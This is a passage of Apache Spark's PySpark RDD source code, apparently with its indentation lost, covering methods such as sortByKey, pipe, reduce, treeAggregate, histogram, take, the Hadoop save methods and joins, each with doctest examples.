>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, 2)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower() == "true")
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
# noqa
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
spill = self._can_spill()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted if spill else sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
@ignore_unicode_prefix
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
[u'1', u'2', u'', u'3']
"""
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
s = str(obj).rstrip('\n') + '\n'
out.write(s.encode('utf-8'))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip(b'\n').decode('utf-8') for x in iter(pipe.stdout.readline, b''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(port, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = int(numPartitions)
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element(where n = # buckets).
Buckets must be sorted and not contain any duplicates, must be
at least two elements.
If `buckets` is a number, it will generates buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given buckets
as 2, the resulting buckets will be [0,50) [50,100]. buckets must
be at least 1 If the RDD contains infinity, NaN throws an exception
If the elements in RDD do not vary (max == min) always returns
a single bucket.
It will return an tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
